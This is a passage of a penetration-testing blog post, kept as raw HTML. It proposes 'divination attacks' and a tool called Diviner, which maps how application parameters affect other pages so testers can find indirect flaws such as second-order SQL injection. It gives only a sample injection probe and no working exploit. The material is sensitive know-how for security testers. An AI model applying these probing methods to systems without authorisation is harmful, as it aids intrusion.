&lt;b&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;
&lt;b&gt;&lt;i&gt;Viewing the Dynamic Server Memory &amp;amp; Processes Map Generated by
Diviner&lt;/i&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgi-MkqoQS6UdBiUhDaSTOn2ffnup1P66PxxA8jPbbok3qzYUE8-DJWQ-tE36dHoEjg_LXuqNWA_cZEKE1y357hO0P-_eJGGIe4WZkPyyC379np4SuhQDyvhpluQPbtesDDwueRIfdH54k/s1600/diviner-poc-server-memory-divination-and-leads-for-cross-page-attacks.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;388&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgi-MkqoQS6UdBiUhDaSTOn2ffnup1P66PxxA8jPbbok3qzYUE8-DJWQ-tE36dHoEjg_LXuqNWA_cZEKE1y357hO0P-_eJGGIe4WZkPyyC379np4SuhQDyvhpluQPbtesDDwueRIfdH54k/s640/diviner-poc-server-memory-divination-and-leads-for-cross-page-attacks.png&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;
&lt;b&gt;&lt;i&gt;&lt;br /&gt;&lt;/i&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;
&lt;b&gt;&lt;i&gt;&lt;br /&gt;&lt;/i&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;
&lt;b&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;
&lt;b&gt;&lt;u&gt;&lt;span style=&quot;font-size: 16pt; line-height: 115%;&quot;&gt;The Problem – The
Limitations of Manual Pentesting&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;
The process of &lt;b&gt;manual&lt;/b&gt; penetration testing is a process of trial
and error, which is composed of event-triggering attempts, behavior analysis
and deduction; &lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;
Through a process of trial and error, the tester learns how a certain application
entry point responds to specific input, access patterns and extreme conditions,
locates behaviors that might be caused by potential vulnerabilities, and
verifies (or rules out) the existence of these vulnerabilities through
exploits, comparisons, etc.&lt;span dir=&quot;RTL&quot; lang=&quot;HE&quot; style=&quot;font-family: Arial, sans-serif;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;
Since there are &lt;b&gt;&lt;u&gt;dozens&lt;/u&gt;&lt;/b&gt; of potential &lt;b&gt;generic
application-level attacks&lt;/b&gt; (read the lists in &lt;a href=&quot;https://www.owasp.org/index.php/Category:Attack&quot;&gt;OWASP&lt;/a&gt;, &lt;a href=&quot;http://projects.webappsec.org/w/page/13246978/Threat%20Classification&quot;&gt;WASC&lt;/a&gt;
and &lt;a href=&quot;http://cwe.mitre.org/data/&quot;&gt;CWE&lt;/a&gt; if this number sounds
exaggerated), excluding the use of scanners and fuzzers and with the exception
of very small applications, this process can only be manually performed on &lt;b&gt;part&lt;/b&gt;
of the tested application entry points, and relies heavily on experience,
intuition, methodology and sometimes luck. &lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;
The point I am trying to make is this - currently, there is an &lt;b&gt;inefficient
use of time in the process of manual penetration testing&lt;/b&gt;. &lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;
Don&#39;t jump to conclusions or take it personally... let me explain my
intention:&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;
Even though efficient information gathering enables the tester to narrow
the list of tests that should be performed on each application, entry point,
page or parameter - it still includes a lot of tests to perform, often more
than the tester can do in the time allocated to the test.&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;
Furthermore, since the most of the global information gathering processes
rely on information disclosure, passive information gathering and
fingerprinting, the tester needs to manually gather information on specific
targets prior to testing them, or perform the test &quot;blindly&quot;, while
relying on other incentives.&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;
Take &lt;b&gt;SQL injection&lt;/b&gt; for example, one of the most common tests that
penetration testers attempt to perform. In order to truly be certain that a
certain location is (or isn&#39;t) vulnerable, the tester needs to receive different
kinds of feedback; Sometimes a visible or hidden error make the task simple (&lt;span style=&quot;color: red;&quot;&gt;blablabla.SQLException&lt;/span&gt;), Sometimes the tester needs to
dig deeper and detect content differentiation, or compare responses to inputs
that contain arithmetic or mathematical operations (&lt;span style=&quot;color: red;&quot;&gt;id=4-2
vs id=5-3&lt;/span&gt;). When the tested entry point does not provide any feedback,
he might be required to use payloads that are designed to delay the execution
of SQL statements, and if an exposure with a similar obscure behavior affects an
offline process or an indirectly affected backend server, he/she might even
need to inject payloads that execute an exploit that alters content (risky) or sends
a notification to external entities (mail, ping, etc).&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;
Assuming the assessment method is a &lt;b&gt;black box assessment&lt;/b&gt;, since
there are various types of databases and syntax injection contexts, the tester
will need to use a &lt;b&gt;lot&lt;/b&gt; of payloads to truly verify the issue - in each
field, and in each location.&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;
Scanners attempt to tackle this issue by performing various tests on a
wide range of targets, but conclude themselves whether or not the location is
vulnerable, and currently, are far from performing these tests in a sufficient
amount of extreme or complex scenarios. &lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;
Fuzzers on the other hand can store the different responses and
behaviors of multiple entry points, but don&#39;t provide out-of-the-box support
for complex processes or complex analysis methods, are usually not
application-aware, and present the information in a way that is hard to digest.&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;
The problem, however, could be handled using another method:&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;
Divination attacks, a crossbreed between automated testing and human
deduction, provide an alternate (or complementary) route:&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;
Consider the methods required to detect the following complex vulnerability:&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;
&lt;i&gt;&quot;SQL injection vulnerability, in which the *attack payload* is
injected into a server variable in the *registration phase*, stored in the
*database*, but only affects the application in the *event of writing an exception
into a database log* (the vulnerable code segment), which only occurs in a
module that generates the *monthly report* for a user, which requires
*authentication*, while the log triggering exception requires the user to
*directly access* the last phase of a multiphase report generation process
while skipping the rest of the phases in the flow (forceful browsing).&quot;&lt;o:p&gt;&lt;/o:p&gt;&lt;/i&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;
In other words, a vulnerability that affects the application indirectly,
and only when certain extreme scenarios occur.&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;
Although talented (or lucky) lucky testers might be able to detect it in
a limited scope, it&#39;s unlikely that it will be detected by a black box automated
vulnerability scanner, passive security scanner, or any other black-box tool…
that is unless a certain process will make it possible…&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;
&lt;b&gt;&lt;u&gt;&lt;span style=&quot;font-size: 16pt; line-height: 115%;&quot;&gt;Divination Attacks&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;
When using the general term &quot;Divination&quot;, this article refers
to the following interpretation:&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;
&lt;b&gt;&lt;span style=&quot;font-size: 12pt; line-height: 115%;&quot;&gt;&quot;Divination is
the attempt to gain insight into a question or situation by way of an occultic
standardized process or ritual. Used in various forms for thousands of years,
diviners ascertain their interpretations of how a querent should proceed by
reading signs, events, or omens.&quot; - &lt;/span&gt;&lt;/b&gt;&lt;span style=&quot;font-size: 12pt; line-height: 115%;&quot;&gt;Wikipedia&#39;s Definition for Divination.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-size: 12pt; line-height: 115%;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;
For those of you that read this section first, and for those that got confused
from the introduction, please, let me clarify: I am &lt;b&gt;not&lt;/b&gt; proposing to
hire the practitioners of witchcraft to participate in penetration tests.&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;
I am however, proposing the following solution to the time management
problem:&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;
&lt;b&gt;Inspect the direct and indirect effect of each parameter, on each
page, with every possible sequence and under every possible condition, before
deciding which attack to perform, and where.&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;
&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;
Since obtaining this information manually is not probable, the process
needs to be, at least in some aspects, automated.&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;
And how can we obtain this information using an automated process?&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;
&lt;b&gt;Execute Scenarios -&amp;gt; Isolate Behaviors -&amp;gt; Perform Verifications
-&amp;gt; Interpret -&amp;gt; GUI&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;
&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;
Assume that interception proxy contains the following requests in its
request history:&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhk0Ev1O95Esl14hr_OGqgoTqJI2LHwURsIfcqubZEowPGj-7UwKhjwcWe8SupBkXPb7knHkcnkmvWG8ap0X9KcGOhFn4SWhlCoewXZzZ-ND-CPD5ltDMtiWWIKl6rq_12wpC3YgxdIuZ4/s1600/zap-history.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;113&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhk0Ev1O95Esl14hr_OGqgoTqJI2LHwURsIfcqubZEowPGj-7UwKhjwcWe8SupBkXPb7knHkcnkmvWG8ap0X9KcGOhFn4SWhlCoewXZzZ-ND-CPD5ltDMtiWWIKl6rq_12wpC3YgxdIuZ4/s400/zap-history.png&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;
&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;
In order to analyze the effect of a given input parameter on other entry
points (and on the origin entry point), we need to send a value to the target
parameter, and then access another entry point - in order to see the effect
(for example, send a value in the username input parameter to request 4, and
then access request 6 to see if there was any special effect).&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;
The process must be repeated for the next &quot;exit point&quot;, while sending
another value (identical or otherwise) to the target parameter, prior to
accessing the &quot;exit point&quot;.&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj6QxPCkyGtOYKsYHrcH2c2859MWUoV_-db3sJSFnOrVwfv4vMnN2Vszks9K6bjgRxJdPooxGzbzCHpXQG6-0kx1WN6f8nBRjyGgoOgsQTLPOq3c3D7EjDBH41J9bv-mDcq_RfS8a4Mw-Q/s1600/ExploringBehaviors.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;388&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj6QxPCkyGtOYKsYHrcH2c2859MWUoV_-db3sJSFnOrVwfv4vMnN2Vszks9K6bjgRxJdPooxGzbzCHpXQG6-0kx1WN6f8nBRjyGgoOgsQTLPOq3c3D7EjDBH41J9bv-mDcq_RfS8a4Mw-Q/s640/ExploringBehaviors.png&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;
The result of this analysis might change due to various factors, such as:&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;
&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;direction: ltr; unicode-bidi: embed;&quot;&gt;
&lt;/div&gt;
&lt;ul&gt;
&lt;li&gt;&lt;b&gt;&lt;u&gt;Authentication&lt;/u&gt;
-&lt;/b&gt; Authenticate before accessing the entry point, before accessing the
&quot;exit point&quot; (a.k.a target), or not at all.&lt;/li&gt;
&lt;li&gt;&lt;b&gt;&lt;u&gt;Multiple
Sessions&lt;/u&gt;&lt;/b&gt; - When an entry point responds by replacing the session
identifier, the scenario could continue using the old session identifier
(assuming it was not invalidated), or using the new one.&lt;/li&gt;
&lt;li&gt;&lt;b&gt;&lt;u&gt;History
Requirements&lt;/u&gt;&lt;/b&gt; – Certain entry points might require the execution of previous
entry points using a shared session identifier. For example, testing a
parameter sent to the fourth phase of a multiphase process might require access
to previous entry points using the same session identifier, with, or without
authentication.&lt;/li&gt;
&lt;li&gt;&lt;b&gt;&lt;u&gt;Input
Type&lt;/u&gt;&lt;/b&gt; - The target &quot;exit point&quot; and &quot;entry point&quot;
might respond differently to other types of input (e.g. input with random values,
valid values, invalid syntax characters, etc).&lt;/li&gt;
&lt;li&gt;&lt;b&gt;&lt;u&gt;Required
Tokens&lt;/u&gt;&lt;/b&gt; – Certain behaviors might only occur when a required token is
sent to the entry point (or not sent to the entry point) – for example, the
existence of a timestamp or anti-CSRF token might affect each entry point in
different ways.&lt;/li&gt;
&lt;li&gt;&lt;b&gt;&lt;u&gt;Invalid
Access&lt;/u&gt;&lt;/b&gt; – accessing pages &lt;b&gt;without&lt;/b&gt; meeting their &quot;requirements&quot;
might still generate a &quot;beneficial&quot; behavior – for example, accessing
a page &lt;b&gt;without&lt;/b&gt; a valid anti-CSRF token might trigger a response that
reuses a server variable that can be affected, and thus, expose the entry point
to attacks.&lt;/li&gt;
&lt;/ul&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;
So in order to truly analyze the effect of the parameter on the various
entry points of the application, we need to try &lt;b&gt;everything&lt;/b&gt; (or at the
very least – try a lot of scenarios),&amp;nbsp; and
we need to do it to as many input parameters as possible, to as many entry/exit
points as possible, and in various scenarios.&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;
Furthermore, the behavior itself might vary according to the scenario,
input and in-page logic: it can be input reflection, exception, a certain valid
response, time delay, content differentiation or anything else; the behaviors
that we are interested in are behaviors that can be &lt;b&gt;&lt;i&gt;traced back&lt;/i&gt;&lt;/b&gt;
to a certain process, memory allocation, potential issue or a specific line of
code.&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;
&lt;b&gt;The information gathered in such a process will be composed of a &lt;u&gt;lot&lt;/u&gt;
of behaviors, which vary per page, per input, and per scenario.&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;
&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;
These &quot;behaviors&quot; can then be presented to the tester in a
simple, visual form, which will enable him to decide which behaviors he should
inspect &lt;b&gt;manually&lt;/b&gt;.&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;
Don&#39;t get me wrong - I am not suggesting that we limit the inspection only
to the information presented by such a process - I&#39;m merely stating that it is &lt;b&gt;wise&lt;/b&gt;
to focus on this information &lt;b&gt;first&lt;/b&gt;, and verify the various leads it
provides before using the hardcore manual approach. After using this approach
for some time, I can clearly state the following:&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-size: 13pt; line-height: 115%;&quot;&gt;The information provided
by the process, when used by a tester, can &lt;b&gt;transform&lt;/b&gt; even a very &lt;b&gt;complex
vulnerability&lt;/b&gt; into a &lt;b&gt;low hanging fruit&lt;/b&gt;. &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-size: 13pt; line-height: 115%;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;
And that&#39;s not all. The collection of behaviors can also be
&quot;converted&quot; into other useful forms, such as the ones presented in
the following sections.&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;
&lt;b&gt;&lt;u&gt;&lt;span style=&quot;font-size: 16pt; line-height: 115%;&quot;&gt;Source Code
Divination&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;
Source code divination is a new concept and approach (can also be
referred to as source code fingerprinting).&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;
Think about it - we use fingerprinting techniques to identify web
servers, content management systems, operating systems, web application
firewalls, and more.&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;
Why not use the same approach to identify specific lines of code? Why
not use it to detect &lt;b&gt;all &lt;/b&gt;the lines of code, or at the very least, a
large portion of the server code?&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;
Nearly all of us classify &lt;b&gt;source code disclosure&lt;/b&gt;, or attacks that
can obtain the server source code as severe exposures (at least to some
extent), and claim in the reports that we provide to customers that attackers
can harness this information to enhance their attacks, learn about the system&#39;s
structure and identify potential flaws in it.&lt;/div&gt;
